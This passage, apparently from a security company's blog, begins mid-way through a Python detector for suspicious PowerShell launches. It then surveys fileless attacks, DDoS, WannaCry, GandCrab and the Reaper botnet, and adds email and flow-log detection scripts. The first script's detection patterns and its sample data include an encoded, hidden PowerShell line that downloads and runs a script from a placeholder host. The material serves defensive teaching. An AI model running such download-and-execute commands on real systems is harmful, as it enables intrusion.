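RULES = [
    ("execution-policy-bypass", r"-e(?:p|x|xec|xecutionpolicy)\s+(?:bypass|unrestricted)", 3),
    ("hidden-window",           r"-w(?:in(?:dowstyle)?)?\s+hidden", 2),
    ("no-profile",              r"-nop(?:rofile)?\b", 1),
    ("invoke-expression",       r"\biex\b|invoke-expression", 3),
    ("remote-download",         r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", 3),
]
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
ALERT_THRESHOLD = 5
LINE_RE = re.compile(
    r"^(?P<event>\d+)\|host=(?P<host>[^|]*)\|user=(?P<user>[^|]*)"
    r"\|parent=(?P<parent>[^|]*)\|cmd=(?P<cmd>.*)$"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str) -> dict:
    """Score one command line; the base64 blob is swapped for its decoded text
    so that patterns are matched on what PowerShell would actually run."""
    decoded = decode_encoded_command(cmdline)
    hits, score = [], 0
    if ENC_RE.search(cmdline):
        hits.append("encoded-command")
        score += 2
    text = ENC_RE.sub("-enc <blob>", cmdline) + (" " + decoded if decoded else "")
    for name, pattern, weight in RULES:
        if re.search(pattern, text, re.IGNORECASE):
            hits.append(name)
            score += weight
    return {"score": score, "hits": hits, "decoded": decoded}


def triage(lines) -> list:
    """Parse constructed 4688-style lines and return those worth an analyst's time."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["event"] != "4688":
            continue
        result = score_command_line(m["cmd"])
        if m["parent"].lower() in OFFICE_PARENTS:   # script host spawned by a document
            result["hits"].append("office-parent")
            result["score"] += 3
        if result["score"] >= ALERT_THRESHOLD:
            alerts.append({"host": m["host"], "user": m["user"],
                           "parent": m["parent"], **result})
    return alerts


def _encoded(script: str) -> str:
    """Encode text the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample lines. The URL is a placeholder, not a real staging host.
SAMPLE_LINES = [
    "4688|host=SRV01|user=CORP\\admin|parent=explorer.exe"
    "|cmd=powershell.exe -NoProfile -Command Get-Service",
    "4688|host=SRV02|user=SYSTEM|parent=svchost.exe"
    "|cmd=powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "4688|host=WS07|user=CORP\\jdoe|parent=WINWORD.EXE"
    "|cmd=powershell.exe -nop -w hidden -ep bypass -enc "
    + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LINES):
        print(alert)
```

Only the document-spawned, encoded, downloading launch crosses the threshold; the scheduled backup script that merely sets `-ExecutionPolicy Bypass` does not, which is the point: a bypass on its own is routine administration, the combination is not.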
2. Fileless Cyberattacks via Microsoft’s Remote Desktop Protocol (RDP)
Another way by which attackers infect victims’ computers filelessly is via Microsoft’s Remote Desktop Protocol.
Microsoft’s Remote Desktop Protocol, just like Windows PowerShell, is proprietary software developed by Microsoft. And just like PowerShell, which is primarily used by system administrators, Remote Desktop Protocol is used by system administrators to access other computers or office computer networks from a remote location via the internet.
Attackers gain access to victims' computers via Remote Desktop Protocol simply by guessing their way past weak passwords or by using popular password cracking tools. McAfee Labs reported that thousands of these Remote Desktop Protocol login details (specifically for Windows XP through Windows 10 and Windows Server 2008 and 2012) are sold online for between $3 and $19.
Once attackers gain access to your organization’s computer network via Remote Desktop Protocol, they can do anything with it such as install any malware of their choice.
In both kinds of fileless cyberattack, via Windows PowerShell and via Remote Desktop Protocol, once attackers gain access to victims’ computers they appear as system administrators, masking their identity and allowing them to hide in plain sight.
3. PowerGhost Fileless Cryptocurrency Mining Malware
PowerGhost is a cryptocurrency mining malware – a malicious software that hijacks the processing power of victims’ computers. Kaspersky Lab first identified this malware.
This malware spreads across large corporate networks, infecting both workstations and servers, by using a number of fileless techniques, including Mimikatz, a hacking tool designed to siphon a Windows user's password out of the computer's memory.
PowerGhost propagates itself across the local network by launching a copy of itself via Windows PowerShell and via the now-notorious EternalBlue exploit – a spy tool believed to have been developed by the US National Security Agency (NSA) and leaked by the hacking group Shadow Brokers in April 2017. On March 14, 2017, a month before Shadow Brokers leaked the EternalBlue code, Microsoft released a security update or patch fixing the security vulnerability exploited by EternalBlue.
Prevention against Fileless Cyberattacks
As shown in the above-mentioned examples, attackers use a number of techniques for fileless attacks. Here are some of the preventive measures against fileless attacks:
By keeping your software up to date, your organization’s computer network won’t be vulnerable to the EternalBlue exploit.
When you are looking to boost staff awareness and better protect your applications and infrastructure, get in touch and we will be happy to help.
DDoS Attacks: Protecting Your Business from Critical Disruption
In March 2018, developer platform GitHub was struck by the most powerful DDoS (distributed denial-of-service) attack ever recorded.
How big? 1.35 terabits of traffic was hitting GitHub each second.
Still, GitHub was not without its defenses.
Within 10 minutes of the attack starting, GitHub’s DDoS mitigation service stepped in to combat it. It rerouted all incoming and outgoing traffic through scrubbing, blocking the malicious packets responsible.
Such decisive action paid off. The attack ended eight minutes after the service took over, and GitHub was able to get back on track after just five minutes of downtime.
If GitHub had been without such a fast, effective response, the outcome of the attack might have been much worse.
A DDoS attack is a fairly cold-blooded attempt to disrupt a server, service or network’s standard operation by bombarding it with excessive traffic.
DDoS attacks use many compromised computer systems to mount the assault, overwhelming the target system and crowding out genuine traffic.
GitHub had been targeted before, with an attack lasting for six days in 2015.
A company or organization’s website can be severely affected by a DDoS attack, potentially costing it a great deal of money in lost business. In fact, the average cost of a DDoS attack for businesses rose to more than $2.5 million in 2017.
Research highlights just how common DDoS disruptions are for many companies. A staggering 849 of 1,010 enterprises questioned had been hit by a DDoS attack. DDoS disruption was estimated to cost target businesses as much as $100,000 per hour.
These figures make for disturbing reading, especially for smaller companies on a much tighter budget than their larger competitors. Still, even for global corporations, the risk of a DDoS attack can be incredibly troubling: after all, they may have more to lose.
Effective cybersecurity and preparation have never been more vital. Every cent available must be channeled into reinforcing your business against potential threats.
Still, this is easier said than done: cybercrime and security can be daunting. To help you understand how best to defend yourself against DDoS attacks, we have explored some of the most effective options below:
Get to know the symptoms
Recognizing the signs of an incoming DDoS attack can make a significant difference to how you handle it.
There is no real warning for a DDoS attack, though. While some hackers may issue threats, there will generally be nothing other than the assault itself.
As you might not browse your own website much on a day-to-day basis, it may not be until customers begin complaining about its performance that the warning bells start to sound.
However, certain other clues will tip you off:
The earlier you’re able to spot the warning signs, the sooner you can start to act.
Have a plan
Every business should have a plan in place for a potential DDoS attack. Once you confirm that your system has been targeted, you can jump to your plan and follow it. Being prepared helps to reduce the likelihood of panic or making mistakes that exacerbate the disruption.
Make sure all key players from each department are alerted to the situation and understand how best to handle it at their end. If everyone can work together and focus on damage limitation, you’re more likely to come out of the DDoS attack with minimal impact.
Companies that have no preparations for dealing with such a situation could waste valuable time trying to make sense of it.
Know how to prioritize
You will only have limited access to your system during a DDoS attack. Make sure you focus on keeping the most high-value services and applications running to preserve as much ‘normal’ function as possible.
Again, this comes down to planning. You should have an immediate idea which areas can be let go and which must be the priority.
Pay attention to your network security
Conducting security audits on your network on a regular basis is an effective way to keep your system protected.
Take a close look at the strength of passwords (particularly for the most vulnerable areas), review which employees have access to key data, and run comprehensive checks on software. Do you have the most up to date versions? Have any known security risks come to light with an application you’re using?
A network security audit may not be enough in itself to defend your business against a DDoS attack, but it can play a large part in the process. Incorporate this into ongoing workplace routines: make sure it becomes a habit and is never overlooked.
Letting your system go without the proper audits and preparations can leave it vulnerable to attack. Being complacent and assuming your business will escape the attention of cybercriminals is never a smart move.
Turn to the professionals
Your system security is paramount to keeping your business up and running. Not only does your entire flow of service depend on effective protection, so too does your customers’ experience.
Lengthy downtime can leave buyers with little choice but to start looking elsewhere if you cannot meet their needs. On top of this, they may wonder how safe their personal and financial data are within your company.
Hiring a professional cybersecurity firm to defend your system against DDoS attacks can help to take the strain. You will be free to focus on other areas of running your business while the experts handle the heavy lifting.
Are you concerned about your company’s vulnerability to DDoS attacks? What steps have you taken to safeguard your system? Share your thoughts and ideas below and contact us today to protect your organization.
What is Remote Code Execution Attack & How to Prevent this Type of Cyberattack
Microsoft recently rolled out its latest security update, fixing 50 security vulnerabilities. Out of the 50 security vulnerabilities fixed by Microsoft in its June 12th security update, 14 allow remote code execution.
What is Remote Code Execution?
Remote code execution (RCE) refers to the ability of a cyberattacker to access and make changes to a computer owned by another, without authority and regardless of where the computer is geographically located.
RCE allows an attacker to take over a computer or a server by running arbitrary malicious software (malware). "RCE (remote code execution) vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server," Imperva said.
Remote Code Execution Example #1: Microsoft Excel Remote Code Execution Vulnerability
One example of a remote code execution vulnerability is CVE-2018-8248, one of the security vulnerabilities fixed by Microsoft in its June 12th security update. CVE-2018-8248, also known as “Microsoft Excel Remote Code Execution Vulnerability”, allows an attacker to run malware on the vulnerable computer.
An attacker exploiting CVE-2018-8248 could take full control of the compromised computer if its owner logs on with administrative user rights. With full control, the attacker could view, change or delete data; install programs; or create new accounts with full user rights.
According to Microsoft, one delivery method for exploiting CVE-2018-8248 is a malicious email with an attachment containing a specially crafted file that targets an affected version of Microsoft Excel. Another delivery method is a web-based attack scenario, whereby an attacker hosts a website, or uses a compromised website that accepts or hosts user-provided content, containing a specially crafted file designed to exploit CVE-2018-8248.
In both scenarios, malicious email and web-based attack, the attacker has to convince users to open the attachment or click a link to open the specially crafted file. To date, there is no report of CVE-2018-8248 being exploited in the wild.
Remote Code Execution Example #2: Microsoft Windows SMB Vulnerability
On May 12, 2017, hundreds of thousands of computers worldwide were infected by WannaCry, a malware that encrypts computer files, locks out computer users and demands a ransom payment to decrypt or unlock the files.
WannaCry, as it turns out, exploits a vulnerability that allows remote code execution when an attacker sends specially crafted messages to a Microsoft Server Message Block (SMB) server – SMB being the protocol used for sharing access to files, printers and other resources on a network.
Unlike other remote code execution attacks, which rely on malicious emails and web-based attacks as delivery methods, WannaCry’s delivery method was to scan the internet for vulnerable SMB ports and use one of the alleged U.S. National Security Agency (NSA) spying tools, “EternalBlue”, which takes advantage of the vulnerability in Microsoft’s SMB. Once a vulnerable SMB service is found, DoublePulsar (another alleged NSA spying tool) is used as the backdoor through which the WannaCry malware is installed.
EternalBlue and DoublePulsar are 2 of the spying tools allegedly used by the NSA that were leaked in April 2017 by a group of hackers who called themselves Shadow Brokers. According to Microsoft, the security vulnerabilities exposed by Shadow Brokers were fixed by the security update released by the company in March 2017 – a month before Shadow Brokers publicly released the alleged NSA spying tools.
Researchers at Rendition reported that in late April and the first few days of May 2017 – several days after Microsoft issued a security update fixing the security vulnerabilities exposed by Shadow Brokers – more than 148,000 computers were compromised by EternalBlue and DoublePulsar.
Hundreds of thousands of computers were infected by WannaCry because many of the compromised machines were servers and because of the malware’s worm-like, self-propagating capability: computers connected to an infected server were infected in turn.
Remote Code Execution Attacks and Cryptocurrency Mining
At the height of the cryptocurrency boom in December 2017, Imperva reported that cryptocurrency mining drove almost 90% of all remote code execution attacks.
Imperva said 88% of all remote code execution attacks in December 2017 sent a request to an external source to try to download a cryptocurrency mining malware.
“These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server,” Imperva said. “The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.”
Timely patching, that is, prompt installation of software updates, ranks as the top cybersecurity measure for preventing remote code execution attacks.
For instance, to prevent remote code execution via CVE-2018-8248 vulnerability, Microsoft’s June 12, 2018 security update has to be installed. In the case of WannaCry cyberattack, remote code execution via the exploitation of Microsoft Windows SMB vulnerability could have been prevented if only Microsoft’s March 2017 security update had been timely applied.
To stop attackers from infecting vulnerable servers with cryptocurrency mining malware, the initial attack must be blocked. As that initial attack, cybercriminals typically exploit remote code execution vulnerabilities to launch their malware, similar to what the WannaCry attackers did.
If your organization uses computers or servers running software known to be vulnerable to remote code execution, the latest vendor patch mitigating that particular vulnerability should be applied promptly.
As a rule of thumb, to significantly minimize the risk, your company must collect, analyze and act on the most recent threat intelligence. Your IT team must be equipped with the best tools to apply patches promptly, thus mitigating the risk of a data breach. Better yet, workstation and server patching can and should be automated to prevent remote code execution and other cyberattacks.
How to Avoid Being a Victim of Email-Based Ransomware
The latest version of the ransomware called “GandCrab” is an example of how cyber attackers bait their ransomware victims through an email spam campaign.
Last month, security researchers at Fortinet observed a surge in an email spam campaign delivering the latest version of GandCrab ransomware.
GandCrab ransomware is a malicious software (malware) that encrypts files on the compromised computers, locks out users and demands a payment to decrypt or unlock the files.
How Ransomware Victims Are Baited via Email Spam Campaign
The latest version of GandCrab ransomware is delivered by spam emails. While these spam emails don’t target specific individuals, they do target specific countries: email addresses in the US are the primary recipients of this spam campaign, followed by addresses in the UK and in Canada.
Recipients of these spam emails are tricked into opening them because the attackers use subjects commonly seen by people working in an organization:
Once the malware is downloaded to a compromised computer, all the files on the computer are encrypted, preventing the user from accessing them, and a ransom note is displayed on the screen.
This ransom note directs the user to a site reachable with the Tor browser – a browser designed to protect privacy and anonymity. Once accessed, this site tells the victim that the files on the compromised computer have been encrypted. The victim is asked to pay USD 800 within a certain period. If payment isn't made within the allowed period, the cost of decrypting the files is doubled.
GandCrab Ransomware Earlier Versions
The first version of GandCrab ransomware appeared in the wild on January 30, 2018.
This early version of GandCrab was likewise distributed via spam emails purporting to be invoices. It was also distributed via malicious advertisements (malvertisements) linked to malicious websites from which the download of the GandCrab ransomware was initiated.
Like the latest version, the first version of GandCrab encrypts the files on the compromised computer. Instead of asking for a ransom in US dollars, however, the first version asked for payment in the Dash cryptocurrency – the first time this cryptocurrency had been used in a ransomware campaign. Previously, ransomware attackers preferred the cryptocurrencies Bitcoin and Monero as ransom payment.
According to Europol, European Union’s law enforcement agency, GandCrab ransomware is run as an affiliate program or ransomware-as-a-service. Anyone who wants to join the GandCrab affiliate program pays 30% to 40% of the ransom revenues to its creator and in return gets a full-featured web panel and technical support.
According to Check Point, as of March 13, 2018, GandCrab has infected over 50,000 computer systems and received an equivalent of USD 300,000 to USD 600,000 in ransom payments.
A tool to decrypt files encrypted by GandCrab (version 1) was developed through a combined effort of the Romanian authorities, Bitdefender and Europol and made available to the public for free.
According to Check Point, the decryptor tool wasn’t the result of a cryptographic breakthrough. It came, rather, from law enforcement’s access to the ransomware’s master server, which enabled the recovery of all the private keys that GandCrab (version 1) had used to perform the encryption; this is evident from the decryptor tool’s dependence on an available victim ID.
The developers of GandCrab, however, regularly modify the ransomware, making the decryption tool developed by the Romanian authorities, Bitdefender and Europol useless against newer versions, as it won't bring the files back.
Paying the ransom for the latest version of GandCrab is, therefore, not advisable, as payment doesn’t guarantee that the attackers have the capability or any intention to decrypt the files.
Social Engineering Feature of GandCrab Ransomware
As can be gleaned from the different versions of GandCrab ransomware, social engineering is employed.
A social engineering cyberattack happens when an attacker uses a typical form of human interaction to obtain information about an organization or to compromise the organization’s computer systems.
Today’s human interaction involves technology. Many human interactions now happen via email exchanges – a form of online communication that has persisted despite the advent of newer forms of communication like instant messaging, social networking and online chat.
GandCrab isn't the only ransomware that relies on spam emails for its distribution. Other notorious ransomware families like Spora and Locky are also distributed through spam emails. For instance, on August 28th last year, in just 24 hours, over 23 million spam emails were sent carrying the Locky ransomware.
It is interesting to note that all three ransomware families, GandCrab, Spora and Locky, tricked their victims into opening email attachments laden with ransomware by using the subject “Invoice”.
Here are some of the best practices on how to avoid being a victim of email-based ransomware like GandCrab:
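One of those practices is inspecting attachments at the mail gateway before a user ever sees the “Invoice” lure. The check below is an added example written for this article, not Fortinet's or the ransomware authors' code: it parses a message, scores the subject word the article names, and opens zip attachments to look for scripts hiding behind a decoy extension. The two messages are constructed inline; the risky extension list and the quarantine threshold are assumptions of the example, not campaign indicators.

```python
"""Triage inbound mail for the attachment lure used by GandCrab, Spora and Locky.

Added example, not from the original article or Fortinet. The messages are
constructed; the extension lists and threshold are assumptions, not indicators.
"""
import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

LURE_WORDS = {"invoice"}            # the subject the article names; extend from your own telemetry
RISKY_EXT = {".exe", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta",
             ".jar", ".bat", ".cmd", ".ps1", ".docm", ".xlsm"}   # executable or macro-enabled
DECOY_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}   # seen in double extensions
QUARANTINE_THRESHOLD = 4


def name_findings(name: str) -> list:
    """Weighted findings for one filename: executable type and double extension."""
    findings = []
    stem, ext = os.path.splitext(name.lower())
    if ext in RISKY_EXT:
        findings.append((f"executable or script attachment: {name}", 3))
    if os.path.splitext(stem)[1] in DECOY_EXT:        # e.g. invoice.pdf.js
        findings.append((f"double extension: {name}", 2))
    return findings


def attachment_findings(name: str, data: bytes) -> list:
    """Findings for an attachment; zip archives are opened and their members checked."""
    findings = name_findings(name)
    if name.lower().endswith(".zip"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    findings += [(f"inside {name}, {r}", w) for r, w in name_findings(member)]
        except zipfile.BadZipFile:
            findings.append((f"unreadable archive: {name}", 2))
    return findings


def triage_message(raw: bytes) -> dict:
    """Parse an RFC 5322 message and decide whether to deliver or quarantine it."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    subject = str(msg["Subject"] or "")
    findings = []
    if any(word in subject.lower() for word in LURE_WORDS):
        findings.append((f"lure subject: {subject}", 1))
    for part in msg.iter_attachments():
        data = part.get_content()
        if isinstance(data, str):
            data = data.encode("utf-8")
        findings += attachment_findings(part.get_filename() or "unnamed", data)
    score = sum(weight for _, weight in findings)
    return {"score": score, "reasons": [reason for reason, _ in findings],
            "verdict": "quarantine" if score >= QUARANTINE_THRESHOLD else "deliver"}


def _message(subject: str, body: str, filename: str, data: bytes, subtype: str) -> bytes:
    """Build a constructed message with one attachment (sample data, not real mail)."""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "staff@example.invalid"
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(data, maintype="application", subtype=subtype, filename=filename)
    return msg.as_bytes()


def build_sample_lure() -> bytes:
    """Constructed lure: 'Invoice' subject, zip hiding a script behind a .pdf decoy extension."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_4821.pdf.js", "// constructed placeholder, not a real payload\n")
    return _message("Invoice #4821", "Please see the attached invoice.",
                    "invoice_4821.zip", buf.getvalue(), "zip")


def build_sample_benign() -> bytes:
    """Constructed legitimate invoice: same subject word, plain PDF attachment."""
    return _message("Invoice for March", "Attached is your monthly invoice.",
                    "invoice_march.pdf", b"%PDF-1.4 constructed placeholder\n", "pdf")


if __name__ == "__main__":
    for build in (build_sample_lure, build_sample_benign):
        print(build.__name__, triage_message(build()))
```

The subject word alone scores too low to block anything, so a genuine March invoice is delivered; it is the script with a decoy extension inside the archive that pushes the lure over the quarantine threshold.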
Reaper IoT Botnet Threatens to Take Down Websites
The Reaper IoT botnet, considered more powerful than the Mirai botnet, is spreading worldwide and threatens to take down websites.
According to Check Point researchers, the Reaper botnet already infected one million IoT devices worldwide. "So far we estimate over a million organizations have already been affected worldwide, including the US, Australia and everywhere in between, and the number is only increasing," Check Point researchers said.
Researchers at Qihoo 360 Netlab, meanwhile, reported that the number of “vulnerable devices in one c2 queue waiting to be infected” reached over 2 million.
An IoT botnet is a set of internet-connected smart devices infected by the same malware and controlled by a cyber criminal from a remote location. It’s typically used by cyber criminals to launch a distributed denial-of-service (DDoS) attack.
“In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer,” the United States Computer Emergency Readiness Team (US-CERT) defines DDoS attack. “By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses.”
Infecting millions of IoT devices with a malware is a time-consuming task. Cyber criminals found a way to automate this task by creating a botnet – an army of infected IoT devices. The Reaper malware, as well as the Mirai malware, is spread by the IoT devices themselves. After infecting a particular IoT device, this infected device starts to look for other devices to infect.
The Mirai botnet in October 2016 brought down major websites – including Twitter, Spotify and Reddit – by launching a DDoS attack against the DNS infrastructure of New Hampshire-based company Dyn. Many major websites rely on Dyn’s internet infrastructure.
Reaper Botnet versus Mirai Botnet
While the Reaper botnet shares similar characteristics with Mirai, it differs in many ways with the Mirai botnet. On September 30, 2016, the attacker known as “Anna-senpai” publicly released the source code of Mirai. According to Check Point and Qihoo 360 Netlab researchers, Reaper borrows some of the source code of Mirai, but this new botnet is significantly different from Mirai in several key behaviors.
Here are some of the differences between Reaper and Mirai:
1. Number of Affected IoT Devices
The first difference between the Reaper botnet and Mirai botnet is in terms of the number of affected IoT devices. Mirai affected about 500,000 IoT devices, while Reaper has infected over a million IoT devices.
2. Means of Infecting IoT Devices
Mirai was able to infect hundreds of thousands of IoT devices by exploiting IoT users’ failure to change the factory default login and password details. By using those default credentials, the Mirai attackers were able to infect a massive number of IoT devices.
Reaper, on the other hand, infects IoT devices by exploiting several IoT vulnerabilities for which the devices’ manufacturers may or may not have issued security updates or patches. The Reaper attackers can, therefore, infect IoT devices even when a strong password is used, since their means of entry is the exploitation of known software vulnerabilities.
According to Check Point researchers, the Reaper, for instance, infects unpatched wireless IP cameras by exploiting the “CVE-2017-8225” vulnerability.
3. Botnet Capabilities
Mirai has already shown what it can do: it brought down major websites worldwide, if only for a few hours. For Reaper, it’s still unclear what it is meant to do. As of this writing, Reaper’s creator or creators just want (based on the code they wrote) to infect as many IoT devices as possible, without yet having written the command to attack any internet infrastructure or websites.
"It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organizations make proper preparations and defense mechanisms are put in place before an attack strikes," Check Point researchers said.
The sheer number of IoT devices infected by Reaper – more than twice the number of Mirai’s victims – shows how powerful and devastating Reaper could be when used to launch a DDoS attack.
Gartner projected that 8.4 billion IoT devices will be in use worldwide in 2017 and will reach 20.4 billion by 2020. Examples of IoT devices include security systems (alarm systems, surveillance cameras), automation devices (devices that control lighting, heating and cooling, electricity), smart appliances (refrigerators, vacuums, stoves) and wearables (fitness trackers, clothing, watches).
"As more businesses and homeowners use Internet-connected devices to enhance company efficiency or lifestyle conveniences, their connection to the Internet provides new vulnerabilities for malicious cyber actors to exploit," the US Federal Bureau of Investigation (FBI) said. "Once an IoT device is compromised, cyber criminals can facilitate attacks on other systems or networks, send spam e-mails, steal personal information, interfere with physical safety, and leverage compromised devices for participation in distributed denial of service (DDoS) attacks."
How to Block Reaper IoT Botnet
In most cases, owners of infected IoT devices are unaware that their devices are infected and are being used for criminal activities, such as launching a DDoS attack. IoT users who fail to change their devices’ default login and password details, or who fail to apply security updates, are part of the problem, “blindly” contributing to cyber criminal activities like DDoS attacks.
Here are the top cyber security measures to stop attackers from infecting your IoT devices and turning them into a botnet:
1. Timely Apply Security Updates of IoT Software
Always apply in a timely manner all security updates issued by your IoT manufacturer.
2. Use Strong Password
While sophisticated malware like Reaper can bypass a strong password, it still pays to use one to ward off less sophisticated malware.
3. Isolate IoT devices on their own protected networks.
4. Block traffic from unauthorized IP addresses by configuring network firewalls.
5. Turn off IoT devices when not in use.
6. When buying an IoT device, look for manufacturers that offer software updates.
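Isolating IoT devices on their own network (measure 3 above) also gives you a vantage point: their flows can be watched for the scanning behaviour an infected device shows, and the same flow records reveal the traffic symptom of an incoming DDoS that the earlier DDoS section says you will usually notice only when customers complain. The script below is an added example written for this article, not the researchers' or any vendor's tool: it reads constructed NetFlow-style records (an assumed "ts,src,dst,dport" layout) and reports a widely distributed spike in connections to a service, and an IoT-subnet host fanning out to many addresses on the telnet and web ports IoT worms probe. Thresholds are illustrative.

```python
"""Two flow-log checks: the traffic symptom of an incoming DDoS, and an IoT host
scanning for new victims.

Added example, not from the original article. Records are constructed and the
"ts,src,dst,dport" layout is an assumption; thresholds are illustrative.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass

SCAN_PORTS = {23, 2323, 80, 81, 8080}   # telnet and web ports typically probed by IoT worms


@dataclass(frozen=True)
class Flow:
    ts: int        # seconds on a constructed clock
    src: str
    dst: str
    dport: int


def parse_flows(text: str) -> list:
    """Parse 'ts,src,dst,dport' lines; '#' lines are comments."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split(",")
        flows.append(Flow(int(ts), src, dst, int(dport)))
    return flows


def inbound_spike(flows, target: str, window: int = 10,
                  multiplier: int = 20, min_sources: int = 50) -> list:
    """Flag windows where connections to `target` jump far above the median of
    earlier windows and come from many distinct sources (distributed, not one
    chatty client)."""
    per_window = defaultdict(list)
    for f in flows:
        if f.dst == target:
            per_window[f.ts // window].append(f.src)
    alerts, history = [], []
    for w in sorted(per_window):
        sources = per_window[w]
        count, distinct = len(sources), len(set(sources))
        if history:
            baseline = sorted(history)[len(history) // 2]
            if count >= multiplier * max(baseline, 1) and distinct >= min_sources:
                alerts.append({"window_start": w * window, "connections": count,
                               "distinct_sources": distinct, "baseline": baseline})
        history.append(count)
    return alerts


def scanning_hosts(flows, iot_net: str, window: int = 60, min_targets: int = 40) -> list:
    """Return IoT-subnet hosts that contact many distinct addresses on scan ports
    within one window; a camera or thermostat has no business doing that."""
    net = ipaddress.ip_network(iot_net)
    targets = defaultdict(set)
    for f in flows:
        if f.dport in SCAN_PORTS and ipaddress.ip_address(f.src) in net:
            targets[(f.src, f.ts // window)].add(f.dst)
    return sorted({src for (src, _), dsts in targets.items() if len(dsts) >= min_targets})


def build_sample_log() -> str:
    """Constructed flows: a minute of normal web traffic, then a one-window flood,
    a well-behaved thermostat, and a camera sweeping telnet across 60 addresses."""
    web, lines = "203.0.113.10", ["# ts,src,dst,dport"]
    for t in range(0, 60, 3):                      # ~3 connections per 10 s from 5 clients
        lines.append(f"{t},198.51.100.{t % 5 + 1},{web},443")
    for i in range(300):                           # 300 connections, 150 sources, t=60..69
        lines.append(f"{60 + i % 10},192.0.2.{1 + i % 150},{web},443")
    for t in range(0, 70, 10):                     # thermostat reporting to one cloud host
        lines.append(f"{t},192.168.50.21,203.0.113.99,443")
    for i in range(60):                            # camera probing telnet on 60 addresses
        lines.append(f"{i},192.168.50.20,198.51.100.{100 + i},23")
    return "\n".join(lines)


if __name__ == "__main__":
    sample = parse_flows(build_sample_log())
    print("DDoS symptom:", inbound_spike(sample, "203.0.113.10"))
    print("scanning IoT hosts:", scanning_hosts(sample, "192.168.50.0/24"))
```

The distinct-source requirement keeps a single misbehaving client from triggering the DDoS check, and the per-window fan-out count keeps a device that talks steadily to one cloud endpoint out of the scanning list.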
Steve E. Driz